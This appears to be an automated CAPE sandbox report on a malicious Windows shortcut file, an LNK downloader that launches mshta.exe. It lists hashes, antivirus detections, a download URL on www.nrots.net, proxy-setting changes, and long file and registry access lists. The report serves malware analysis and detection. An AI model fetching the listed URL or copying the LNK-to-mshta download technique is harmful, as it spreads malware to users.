2020-05-23 00:14:18,781 [lib.api.process] INFO: Terminate event set for process 5952
2020-05-23 00:14:18,796 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 5204
2020-05-23 00:14:18,796 [root] DEBUG: Terminate Event: Attempting to dump process 5952
2020-05-23 00:14:18,796 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00910000.
2020-05-23 00:14:18,796 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-05-23 00:14:18,796 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00910000.
2020-05-23 00:14:18,796 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001576.
2020-05-23 00:14:18,812 [root] INFO: b'C:\\winMkbbUJ\\CAPE\\5952_50511633218142222552020|5952|0;?C:\\Windows\\System32\\mshta.exe;?C:\\Windows\\System32\\mshta.exe;?'
2020-05-23 00:14:18,812 [root] INFO: cape
2020-05-23 00:14:18,812 [root] INFO: ('dump_file', 'C:\\winMkbbUJ\\CAPE\\5952_50511633218142222552020', b'0;?C:\\Windows\\System32\\mshta.exe;?C:\\Windows\\System32\\mshta.exe;?', ['5952'], 'procdump')
2020-05-23 00:14:18,828 [root] INFO: ('dump_file', 'C:\\winMkbbUJ\\CAPE\\5952_50511633218142222552020', '', False, 'files')
2020-05-23 00:14:18,828 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3400.
2020-05-23 00:14:18,828 [lib.api.process] INFO: Termination confirmed for process 5952
2020-05-23 00:14:18,828 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 5952
2020-05-23 00:14:18,828 [root] INFO: Terminate event set for process 5952.
2020-05-23 00:14:18,843 [root] INFO: Created shutdown mutex.
2020-05-23 00:14:18,843 [root] INFO: ('dump_file', 'C:\\Users\\Rebecca\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat', '', False, 'files')
2020-05-23 00:14:19,843 [root] INFO: Shutting down package.
2020-05-23 00:14:19,843 [root] INFO: Stopping auxiliary modules.
2020-05-23 00:14:19,921 [lib.common.results] WARNING: File C:\winMkbbUJ\bin\procmon.xml doesn't exist anymore
2020-05-23 00:14:19,921 [root] INFO: Finishing auxiliary modules.
2020-05-23 00:14:19,921 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-05-23 00:14:19,921 [root] WARNING: Folder at path "C:\winMkbbUJ\debugger" does not exist, skip.
2020-05-23 00:14:19,921 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7_3 win7_3 KVM 2020-05-23 00:18:23 2020-05-23 00:24:05

File Details

File Name file
File Size 2195 bytes
File Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Mon Jul 13 23:58:06 2009, mtime=Mon Jul 13 23:58:06 2009, atime=Tue Jul 14 01:39:21 2009, length=43520, window=hide
MD5 120e3733e167fcabdfd8194b3c49560b
SHA1 e6ab0b94782950d78d981aecbf8a3114a2b0ddd5
SHA256 f8b053e32eed9a5e814c89eec50e743a906f1aadc7a6f58e25f0410863c5ec4a
SHA512 c97a6ba4f47b62a0d7aac5d1845f5ad3cf97af9b326ac213adf6964caa7a61dae3c801b9ef7836b3a0a48748722582efb684cbcd0e3d181de856979186eb732e
CRC32 66C888C5
Ssdeep 24:8k7ppQcGSxA0OV+/T65Cw64o0c18euaoMVZ0KXQaR3+bCGO+/TDQA8PbQA8Pm:8k7/CxGH4o1cKXv3AvO9U+
Yara
  • EXE_in_LNK - Identifies executable artefacts in shortcut (LNK) files. - Author: @bartblaze
  • Download_in_LNK - Identifies download artefacts in shortcut (LNK) files. - Author: @bartblaze

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Guard pages use detected - possible anti-debugging.
Dynamic (imported) function loading detected
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: PROPSYS.dll/
DynamicLoader: PROPSYS.dll/PropVariantToGUID
DynamicLoader: PROPSYS.dll/PSGetNameFromPropertyKey
DynamicLoader: PROPSYS.dll/PSStringFromPropertyKey
Performs HTTP requests potentially not found in PCAP.
url: www.nrots.net:80//images/5328C28B/15936/11348/7c8d64e9/e17e25e
A HTTP/S link was seen in a script or command line
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
A script process initiated network activity
request: /images/5328c28b/15936/11348/7c8d64e9/e17e25e
File has been identified by 31 Antiviruses on VirusTotal as malicious
MicroWorld-eScan: Heur.BZC.YAX.Nioc.1.0443ACBC
CAT-QuickHeal: LNK.Downloader.37267
McAfee: LNK/Agent-FSDJ!120E3733E167
Zillya: Trojan.Agent.Script.360339
Sangfor: Malware
Arcabit: Heur.BZC.YAX.Nioc.1.0443ACBC
F-Prot: LNK/Trojan.ICHT-34
Symantec: Trojan Horse
TrendMicro-HouseCall: TROJ_FRS.VSNTD720
Avast: Other:Malware-gen [Trj]
Kaspersky: HEUR:Trojan.WinLNK.Agent.gen
BitDefender: Heur.BZC.YAX.Nioc.1.0443ACBC
Tencent: Win32.Trojan.Agent.Auto
Ad-Aware: Heur.BZC.YAX.Nioc.1.0443ACBC
Sophos: Troj/DownLnk-X
DrWeb: Trojan.DownLoader33.28040
TrendMicro: TROJ_FRS.VSNTD720
McAfee-GW-Edition: LNK/Agent-FSDJ!120E3733E167
FireEye: Heur.BZC.YAX.Nioc.1.0443ACBC
Emsisoft: Heur.BZC.YAX.Nioc.1.0443ACBC (B)
Ikarus: Trojan.Agent
Cyren: LNK/Trojan.ICHT-34
Antiy-AVL: Trojan/Generic.Generic
Microsoft: Trojan:Win32/Casdet!rfn
AegisLab: Trojan.WinLNK.Acbc.4!c
ZoneAlarm: HEUR:Trojan.WinLNK.Agent.gen
GData: Heur.BZC.YAX.Nioc.1.0443ACBC
ALYac: Trojan.Downloader.LnK.Gen
Rising: Downloader.Mshta/LNK!1.BADA (CLASSIC)
AVG: Other:Malware-gen [Trj]
Qihoo-360: Generic/Trojan.066
Attempts to modify proxy settings

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 1.1.1.1 [VT] Australia

DNS

Name Response Post-Analysis Lookup
www.nrots.net [VT] 185.163.47.134 [VT]

Summary

C:\Users\Rebecca\AppData\Local\Temp\file.lnk
C:\
C:\Windows
C:\Windows\System32
C:\Windows\System32\cftmo.exe
C:\Windows\System32\mshta.exe
C:\Windows\System32\msHta.Exe:Zone.Identifier
C:\Users
C:\Users\Rebecca
C:\Users\Rebecca\AppData
C:\Users\Rebecca\AppData\Local
C:\Users\Rebecca\AppData\Local\Temp
C:\Users\Rebecca\AppData\Local\Temp\file.lnk:Zone.Identifier
C:\Windows\System32\cmd.exe
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\??\Nsi
\Device\RasAcd
C:\Windows\System32\en-US\mshtml.dll.mui
\Device\NetBT_Tcpip_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip_{D33A5283-24A7-4033-8928-D28491165639}
\Device\NetBT_Tcpip6_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip6_{D33A5283-24A7-4033-8928-D28491165639}
C:\Windows\System32\D3D10Warp.dll
C:\Users\Rebecca\AppData\Local\Temp\file.lnk
C:\
C:\Windows
C:\Windows\System32
C:\Windows\System32\cmd.exe
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\Device\RasAcd
C:\Windows\System32\en-US\mshtml.dll.mui
\Device\NetBT_Tcpip_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip_{D33A5283-24A7-4033-8928-D28491165639}
\Device\NetBT_Tcpip6_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip6_{D33A5283-24A7-4033-8928-D28491165639}
C:\Windows\System32\mshta.exe
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\Device\RasAcd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MultiSelectModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoStaticDefaultVerb
HKEY_CLASSES_ROOT\CLSID\{37EA3A21-7493-4208-A011-7F9EA79CE9F5}\shellex\MayChangeDefaultMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\LinkHandler
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_CLASSES_ROOT\.adp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Progid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellCompatibility\ProgIDs\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ddeexec
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\msHta.Exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\msHta.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DEPOff
HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32
\x1a60\x19fEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
